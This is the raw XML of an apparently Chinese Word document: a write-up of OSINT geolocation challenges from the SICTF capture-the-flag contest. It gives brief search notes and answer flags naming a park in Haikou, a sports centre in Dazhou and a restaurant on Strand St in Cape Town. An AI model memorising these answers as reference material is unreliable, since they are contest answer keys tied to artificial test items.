          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008B4345">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="085D1FA6" wp14:editId="40783D1E">
            <wp:extent cx="5274310" cy="2435225"/>
            <wp:effectExtent l="0" t="0" r="2540" b="3175"/>
            <wp:docPr id="211006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8425" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId45"/>
                    <a:srcRect t="12142"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto"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DC2B" w14:textId="33EEC40C" w:rsidR="006C2DAE" w:rsidRDefault="006C2DAE" w:rsidP="00AD762F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006C2DAE">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="69E3CFB5" wp14:editId="480E2FAD">
            <wp:extent cx="5274310" cy="3126105"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1128446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64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AE" w14:textId="065247DF" w:rsidR="005D5A1D" w:rsidRDefault="005D5A1D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ICTF</w:t>
      </w:r>
      <w:r w:rsidRPr="005D5A1D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
      <w:r w:rsidR="00333745">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>海南</w:t>
      </w:r>
      <w:r w:rsidRPr="005D5A1D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>省_</w:t>
      </w:r>
      <w:r w:rsidR="00333745">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>海口</w:t>
      </w:r>
      <w:r w:rsidRPr="005D5A1D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>市_</w:t>
      </w:r>
      <w:r w:rsidR="00333745">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>琼山</w:t>
      </w:r>
      <w:r w:rsidRPr="005D5A1D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>区_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00333745">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>红城湖</w:t>
      </w:r>
      <w:r w:rsidRPr="005D5A1D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>公园</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26A288F1" w14:textId="77777777" w:rsidR="00B76111" w:rsidRDefault="00B76111" w:rsidP="00AD762F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="647FE3CE" w14:textId="77777777" w:rsidR="00B76111" w:rsidRPr="00640685" w:rsidRDefault="00B76111" w:rsidP="00B76111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640685">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:color w:val="D5D7D7"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>树木的压迫</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C633CF4" w14:textId="0E92AE59" w:rsidR="00AF7C11" w:rsidRPr="00AF7C11" w:rsidRDefault="00AF7C11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说了，直接上图</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BD6998A" w14:textId="16245F28" w:rsidR="00B76111" w:rsidRDefault="00AA78FE" w:rsidP="00AD762F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA78FE">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="048B8192" wp14:editId="5EB13AC3">
            <wp:extent cx="5274310" cy="3004185"/>
            <wp:effectExtent l="0" t="0" r="0" b="5715"/>
            <wp:docPr id="234475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0334" w14:textId="0FA62B6D" w:rsidR="00DE0356" w:rsidRDefault="00DE0356" w:rsidP="00AD762F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DE0356">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="25A2DF66" wp14:editId="0AFAD502">
            <wp:extent cx="5274310" cy="2561590"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1849096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5D06" w14:textId="6ED869B5" w:rsidR="001A251A" w:rsidRDefault="001A251A" w:rsidP="00AD762F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001A251A">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1A24B9C2" wp14:editId="4CB0B129">
            <wp:extent cx="5274310" cy="3956050"/>
            <wp:effectExtent l="0" t="0" r="2540" b="6350"/>
            <wp:docPr id="4810334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CF" w:rsidRPr="001176CF">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="55232FEB" wp14:editId="73543CB4">
            <wp:extent cx="5274310" cy="3064510"/>
            <wp:effectExtent l="0" t="0" r="2540" b="2540"/>
            <wp:docPr id="7725045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BE6" w14:textId="5569B2AF" w:rsidR="001F3DE3" w:rsidRDefault="001F3DE3" w:rsidP="00AD762F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F3DE3">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="52B3FDA6" wp14:editId="0830FBB4">
            <wp:extent cx="3988435" cy="4794250"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:docPr id="16749426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9"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="398843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4511" w14:textId="75E70187" w:rsidR="009E4D17" w:rsidRDefault="009E4D17" w:rsidP="00AD762F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009E4D17">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>SICTF{四川省_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="009E4D17">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>达州市</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009E4D17">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>_通川区_凤凰大道376号_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="009E4D17">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>达州市</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009E4D17">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>体育中心}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EC1983E" w14:textId="77777777" w:rsidR="0042168A" w:rsidRDefault="0042168A" w:rsidP="00AD762F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="69D1AEE8" w14:textId="77777777" w:rsidR="0042168A" w:rsidRPr="00C12EC3" w:rsidRDefault="0042168A" w:rsidP="0042168A">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="1D1E1E"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:color w:val="D5D7D7"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C12EC3">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:color w:val="D5D7D7"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>签退</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35BEF894" w14:textId="31B38CE6" w:rsidR="0042168A" w:rsidRDefault="00F27FD9" w:rsidP="00AD762F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F27FD9">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="50311C9C" wp14:editId="6C218E7F">
            <wp:extent cx="5274310" cy="3164840"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="23916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89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965" w14:textId="7C302CE6" w:rsidR="002E7B36" w:rsidRDefault="002E7B36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了一堆spiderman文章</w:t>
      </w:r>
      <w:r w:rsidR="00621109">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>，最后找到个视频</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BD064E3" w14:textId="5D5572C3" w:rsidR="005E364E" w:rsidRDefault="005E364E" w:rsidP="00AD762F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005E364E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="32207CD4" wp14:editId="6905C9A3">
            <wp:extent cx="5274310" cy="2710180"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="104580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31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135" w14:textId="2AA4452B" w:rsidR="00A45333" w:rsidRDefault="00A45333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着这个视频倍数观看</w:t>
      </w:r>
      <w:r w:rsidR="00651B54">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r w:rsidR="005E2B05">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>做题</w:t>
      </w:r>
      <w:r w:rsidR="00082865">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidR="00651B54">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>同时看看风景）</w:t>
      </w:r>
      <w:r w:rsidR="009D3F6F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>，搜索</w:t>
      </w:r>
      <w:r w:rsidR="00960E32" w:rsidRPr="00960E32">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Cresta Grande Cape Town</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DBAC31C" w14:textId="61BDA2D6" w:rsidR="009D3F6F" w:rsidRDefault="009D3F6F" w:rsidP="00AD762F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009D3F6F">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="431CD3F8" wp14:editId="6C121730">
            <wp:extent cx="5274310" cy="2771775"/>
            <wp:effectExtent l="0" t="0" r="2540" b="9525"/>
            <wp:docPr id="138573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346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20DF" w14:textId="60919F4C" w:rsidR="00ED0656" w:rsidRDefault="00ED0656" w:rsidP="00AD76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面被这个街道的名字搞了好久</w:t>
      </w:r>
      <w:r w:rsidR="008226D5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>，要缩写</w:t>
      </w:r>
      <w:r w:rsidR="000E2A5D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>+大小写</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="677187E3" w14:textId="54C206A9" w:rsidR="001348D7" w:rsidRDefault="001348D7" w:rsidP="00AD762F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001348D7">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>SICTF{南非_开普敦_</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001348D7">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>StrandSt_STEERS</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001348D7">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00134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A72"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="39804846"/>
    <w:lvl w:ilvl="0" w:tplc="2DF80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31D7DD9"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F83828BC"/>
    <w:lvl w:ilvl="0" w:tplc="C76284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9190548">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="207022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8F"/>
    <w:rsid w:val="0000464B"/>
    <w:rsid w:val="000149D6"/>
    <w:rsid w:val="000169F4"/>
    <w:rsid w:val="00017C98"/>
    <w:rsid w:val="00022913"/>
    <w:rsid w:val="00024B99"/>
    <w:rsid w:val="00025CD3"/>
    <w:rsid w:val="00050CDF"/>
    <w:rsid w:val="0005514E"/>
    <w:rsid w:val="00057D45"/>
    <w:rsid w:val="0007131B"/>
    <w:rsid w:val="00082865"/>
    <w:rsid w:val="0008433A"/>
    <w:rsid w:val="000918D1"/>
    <w:rsid w:val="00095525"/>
    <w:rsid w:val="000A53AE"/>
    <w:rsid w:val="000B1C20"/>
    <w:rsid w:val="000C1131"/>
    <w:rsid w:val="000E2A5D"/>
    <w:rsid w:val="000E7A51"/>
    <w:rsid w:val="001010B8"/>
    <w:rsid w:val="00103465"/>
    <w:rsid w:val="0011316B"/>
    <w:rsid w:val="001176CF"/>
    <w:rsid w:val="0012678F"/>
    <w:rsid w:val="001348D7"/>
    <w:rsid w:val="00155BD2"/>
    <w:rsid w:val="001638FD"/>
    <w:rsid w:val="00165A70"/>
    <w:rsid w:val="0016622E"/>
    <w:rsid w:val="001712F7"/>
    <w:rsid w:val="001740BE"/>
    <w:rsid w:val="00190DE7"/>
    <w:rsid w:val="0019392D"/>
    <w:rsid w:val="001A251A"/>
    <w:rsid w:val="001A29A7"/>
    <w:rsid w:val="001B0968"/>
    <w:rsid w:val="001B4143"/>
    <w:rsid w:val="001B452F"/>
    <w:rsid w:val="001D323C"/>
    <w:rsid w:val="001F3DE3"/>
    <w:rsid w:val="00202A28"/>
    <w:rsid w:val="00220A65"/>
    <w:rsid w:val="00222A9C"/>
    <w:rsid w:val="002268B6"/>
    <w:rsid w:val="002276CB"/>
    <w:rsid w:val="00230F48"/>
    <w:rsid w:val="00243CCB"/>
    <w:rsid w:val="002449FA"/>
    <w:rsid w:val="00255A43"/>
    <w:rsid w:val="00261E78"/>
    <w:rsid w:val="002910B1"/>
    <w:rsid w:val="002914E1"/>
    <w:rsid w:val="002A0B4D"/>
    <w:rsid w:val="002A147D"/>
    <w:rsid w:val="002B060F"/>
    <w:rsid w:val="002B2A2A"/>
    <w:rsid w:val="002C47F0"/>
    <w:rsid w:val="002D076A"/>
    <w:rsid w:val="002D1141"/>
    <w:rsid w:val="002E7B36"/>
    <w:rsid w:val="002F2EE1"/>
    <w:rsid w:val="002F73BD"/>
    <w:rsid w:val="00317514"/>
    <w:rsid w:val="003309A9"/>
    <w:rsid w:val="0033179E"/>
    <w:rsid w:val="003318D0"/>
    <w:rsid w:val="00331C08"/>
    <w:rsid w:val="00333745"/>
    <w:rsid w:val="00335EC7"/>
    <w:rsid w:val="00341292"/>
    <w:rsid w:val="00342922"/>
    <w:rsid w:val="0036049E"/>
    <w:rsid w:val="00370C5D"/>
    <w:rsid w:val="0037226A"/>
    <w:rsid w:val="00372A5C"/>
    <w:rsid w:val="003758CE"/>
    <w:rsid w:val="00391F6C"/>
    <w:rsid w:val="00396114"/>
    <w:rsid w:val="003B4C70"/>
    <w:rsid w:val="003B75AF"/>
    <w:rsid w:val="003B7C85"/>
    <w:rsid w:val="003C28D7"/>
    <w:rsid w:val="003D02B9"/>
    <w:rsid w:val="003D6F0E"/>
    <w:rsid w:val="003F4FB6"/>
    <w:rsid w:val="0040467E"/>
    <w:rsid w:val="00406A31"/>
    <w:rsid w:val="00413FD7"/>
    <w:rsid w:val="00415927"/>
    <w:rsid w:val="00415C6F"/>
    <w:rsid w:val="00420B4E"/>
    <w:rsid w:val="0042168A"/>
    <w:rsid w:val="004245DB"/>
    <w:rsid w:val="0045323B"/>
    <w:rsid w:val="004653A7"/>
    <w:rsid w:val="00473B8A"/>
    <w:rsid w:val="004901FB"/>
    <w:rsid w:val="0049255C"/>
    <w:rsid w:val="0049383B"/>
    <w:rsid w:val="004A42B3"/>
    <w:rsid w:val="004C265F"/>
    <w:rsid w:val="004D3107"/>
    <w:rsid w:val="004D7C3C"/>
    <w:rsid w:val="004E1496"/>
    <w:rsid w:val="004E27E7"/>
    <w:rsid w:val="004E78B5"/>
    <w:rsid w:val="004F2F82"/>
    <w:rsid w:val="004F30D9"/>
    <w:rsid w:val="004F509E"/>
    <w:rsid w:val="005121E8"/>
    <w:rsid w:val="0052190F"/>
    <w:rsid w:val="00523D6E"/>
    <w:rsid w:val="00532122"/>
    <w:rsid w:val="00533EAC"/>
    <w:rsid w:val="00533FCF"/>
    <w:rsid w:val="0053669C"/>
    <w:rsid w:val="00536C24"/>
    <w:rsid w:val="00562A7E"/>
    <w:rsid w:val="005650F8"/>
    <w:rsid w:val="00566EF4"/>
    <w:rsid w:val="00575285"/>
    <w:rsid w:val="00594FB4"/>
    <w:rsid w:val="0059638F"/>
    <w:rsid w:val="005A0E61"/>
    <w:rsid w:val="005A3F63"/>
    <w:rsid w:val="005B134C"/>
    <w:rsid w:val="005B39DA"/>
    <w:rsid w:val="005C235D"/>
    <w:rsid w:val="005C42E7"/>
    <w:rsid w:val="005C6533"/>
    <w:rsid w:val="005C7F55"/>
    <w:rsid w:val="005D25FB"/>
    <w:rsid w:val="005D5A1D"/>
    <w:rsid w:val="005E2B05"/>
    <w:rsid w:val="005E364E"/>
    <w:rsid w:val="005F656B"/>
    <w:rsid w:val="00606E66"/>
    <w:rsid w:val="00621109"/>
    <w:rsid w:val="0062767C"/>
    <w:rsid w:val="00631F8D"/>
    <w:rsid w:val="00640685"/>
    <w:rsid w:val="0064144B"/>
    <w:rsid w:val="00641A54"/>
    <w:rsid w:val="00644ED6"/>
    <w:rsid w:val="00646C02"/>
    <w:rsid w:val="00651B54"/>
    <w:rsid w:val="00655097"/>
    <w:rsid w:val="0067363B"/>
    <w:rsid w:val="006817F2"/>
    <w:rsid w:val="0069195E"/>
    <w:rsid w:val="00696C6C"/>
    <w:rsid w:val="006B35A1"/>
    <w:rsid w:val="006C2DAE"/>
    <w:rsid w:val="006C6932"/>
    <w:rsid w:val="006C7D7B"/>
    <w:rsid w:val="006D63FD"/>
    <w:rsid w:val="006E10DB"/>
    <w:rsid w:val="006E2172"/>
    <w:rsid w:val="006F11BA"/>
    <w:rsid w:val="006F62DB"/>
    <w:rsid w:val="00706844"/>
    <w:rsid w:val="00711E87"/>
    <w:rsid w:val="00712BB7"/>
    <w:rsid w:val="007225C1"/>
    <w:rsid w:val="00723C4B"/>
    <w:rsid w:val="00726862"/>
    <w:rsid w:val="007319EF"/>
    <w:rsid w:val="00732EC5"/>
    <w:rsid w:val="00734F7D"/>
    <w:rsid w:val="007409E3"/>
    <w:rsid w:val="00771378"/>
    <w:rsid w:val="007717A3"/>
    <w:rsid w:val="007757D0"/>
    <w:rsid w:val="00780B16"/>
    <w:rsid w:val="007951A1"/>
    <w:rsid w:val="007B58F7"/>
    <w:rsid w:val="007C0AD5"/>
    <w:rsid w:val="007C14A0"/>
    <w:rsid w:val="007C7982"/>
    <w:rsid w:val="007E4CB4"/>
    <w:rsid w:val="00800B87"/>
    <w:rsid w:val="00803C33"/>
    <w:rsid w:val="008061FA"/>
    <w:rsid w:val="0081184C"/>
    <w:rsid w:val="00814D73"/>
    <w:rsid w:val="008211F9"/>
    <w:rsid w:val="008226D5"/>
    <w:rsid w:val="008240E2"/>
    <w:rsid w:val="00824B20"/>
    <w:rsid w:val="00824D38"/>
    <w:rsid w:val="0082536B"/>
    <w:rsid w:val="008401A3"/>
    <w:rsid w:val="00852DF1"/>
    <w:rsid w:val="0088432D"/>
    <w:rsid w:val="0089029F"/>
    <w:rsid w:val="008925C4"/>
    <w:rsid w:val="00894BEC"/>
    <w:rsid w:val="008A5E05"/>
    <w:rsid w:val="008B4345"/>
    <w:rsid w:val="008C6F2C"/>
    <w:rsid w:val="008D2CB9"/>
    <w:rsid w:val="008D33CF"/>
    <w:rsid w:val="008D4E5B"/>
    <w:rsid w:val="008D6686"/>
    <w:rsid w:val="008E38B4"/>
    <w:rsid w:val="008E5AB7"/>
    <w:rsid w:val="008F6725"/>
    <w:rsid w:val="00904019"/>
    <w:rsid w:val="009233DE"/>
    <w:rsid w:val="00925363"/>
    <w:rsid w:val="009348FE"/>
    <w:rsid w:val="00937681"/>
    <w:rsid w:val="00944020"/>
    <w:rsid w:val="00951392"/>
    <w:rsid w:val="009532DF"/>
    <w:rsid w:val="0095482F"/>
    <w:rsid w:val="00960E32"/>
    <w:rsid w:val="009637F9"/>
    <w:rsid w:val="00971A1D"/>
    <w:rsid w:val="009942F6"/>
    <w:rsid w:val="009A2B26"/>
    <w:rsid w:val="009B5B03"/>
    <w:rsid w:val="009C73ED"/>
    <w:rsid w:val="009D3F6F"/>
    <w:rsid w:val="009E0DB9"/>
    <w:rsid w:val="009E2A25"/>
    <w:rsid w:val="009E2A52"/>
    <w:rsid w:val="009E4D17"/>
    <w:rsid w:val="00A03F17"/>
    <w:rsid w:val="00A2197C"/>
    <w:rsid w:val="00A366B3"/>
    <w:rsid w:val="00A45333"/>
    <w:rsid w:val="00A45D79"/>
    <w:rsid w:val="00A461E8"/>
    <w:rsid w:val="00A5485B"/>
    <w:rsid w:val="00A65596"/>
    <w:rsid w:val="00A73A85"/>
    <w:rsid w:val="00A75ECE"/>
    <w:rsid w:val="00A75F03"/>
    <w:rsid w:val="00A81C58"/>
    <w:rsid w:val="00A84E38"/>
    <w:rsid w:val="00A94383"/>
    <w:rsid w:val="00AA3F6C"/>
    <w:rsid w:val="00AA5F7B"/>
    <w:rsid w:val="00AA65A7"/>
    <w:rsid w:val="00AA78FE"/>
    <w:rsid w:val="00AB7B5D"/>
    <w:rsid w:val="00AC06F5"/>
    <w:rsid w:val="00AD3C9B"/>
    <w:rsid w:val="00AD507F"/>
    <w:rsid w:val="00AD762F"/>
    <w:rsid w:val="00AE007A"/>
    <w:rsid w:val="00AE4857"/>
    <w:rsid w:val="00AF731C"/>
    <w:rsid w:val="00AF7C11"/>
    <w:rsid w:val="00B061B6"/>
    <w:rsid w:val="00B106BF"/>
    <w:rsid w:val="00B2589E"/>
    <w:rsid w:val="00B3049E"/>
    <w:rsid w:val="00B3730A"/>
    <w:rsid w:val="00B457A7"/>
    <w:rsid w:val="00B56C52"/>
    <w:rsid w:val="00B574E0"/>
    <w:rsid w:val="00B65A50"/>
    <w:rsid w:val="00B76111"/>
    <w:rsid w:val="00B77C5C"/>
    <w:rsid w:val="00B867E8"/>
    <w:rsid w:val="00BA7A5F"/>
    <w:rsid w:val="00BD6445"/>
    <w:rsid w:val="00BE43B5"/>
    <w:rsid w:val="00BE6754"/>
    <w:rsid w:val="00C07C84"/>
    <w:rsid w:val="00C12EC3"/>
    <w:rsid w:val="00C20494"/>
    <w:rsid w:val="00C23124"/>
    <w:rsid w:val="00C231EB"/>
    <w:rsid w:val="00C30B47"/>
    <w:rsid w:val="00C3215B"/>
    <w:rsid w:val="00C3244B"/>
    <w:rsid w:val="00C362D6"/>
    <w:rsid w:val="00C405B9"/>
    <w:rsid w:val="00C518D5"/>
    <w:rsid w:val="00C51CFF"/>
    <w:rsid w:val="00C52A3F"/>
    <w:rsid w:val="00C64E5B"/>
    <w:rsid w:val="00C84F00"/>
    <w:rsid w:val="00C93ADA"/>
    <w:rsid w:val="00CA0E48"/>
    <w:rsid w:val="00CA168A"/>
    <w:rsid w:val="00CA7CCF"/>
    <w:rsid w:val="00CC07F2"/>
    <w:rsid w:val="00CF06AC"/>
    <w:rsid w:val="00CF0A8E"/>
    <w:rsid w:val="00CF16B7"/>
    <w:rsid w:val="00CF3926"/>
    <w:rsid w:val="00D03BFD"/>
    <w:rsid w:val="00D10D0D"/>
    <w:rsid w:val="00D1283C"/>
    <w:rsid w:val="00D12AA9"/>
    <w:rsid w:val="00D1609C"/>
    <w:rsid w:val="00D21A59"/>
    <w:rsid w:val="00D21AB5"/>
    <w:rsid w:val="00D42FBA"/>
    <w:rsid w:val="00D44A02"/>
    <w:rsid w:val="00D61E1A"/>
    <w:rsid w:val="00D6746D"/>
    <w:rsid w:val="00D72F6B"/>
    <w:rsid w:val="00DB469D"/>
    <w:rsid w:val="00DB5989"/>
    <w:rsid w:val="00DB6D05"/>
    <w:rsid w:val="00DD50CB"/>
    <w:rsid w:val="00DD584F"/>
    <w:rsid w:val="00DE0356"/>
    <w:rsid w:val="00DE2AF8"/>
    <w:rsid w:val="00DE4870"/>
    <w:rsid w:val="00DE6D46"/>
    <w:rsid w:val="00DF59AE"/>
    <w:rsid w:val="00E04C72"/>
    <w:rsid w:val="00E06C56"/>
    <w:rsid w:val="00E17BCD"/>
    <w:rsid w:val="00E17FB7"/>
    <w:rsid w:val="00E20482"/>
    <w:rsid w:val="00E21AFA"/>
    <w:rsid w:val="00E22AFC"/>
    <w:rsid w:val="00E2394E"/>
    <w:rsid w:val="00E26FEE"/>
    <w:rsid w:val="00E278EF"/>
    <w:rsid w:val="00E54408"/>
    <w:rsid w:val="00E57C6E"/>
    <w:rsid w:val="00E60830"/>
    <w:rsid w:val="00E610F4"/>
    <w:rsid w:val="00E6402E"/>
    <w:rsid w:val="00E6777B"/>
    <w:rsid w:val="00E720BF"/>
    <w:rsid w:val="00E7664A"/>
    <w:rsid w:val="00E8102E"/>
    <w:rsid w:val="00E851AA"/>
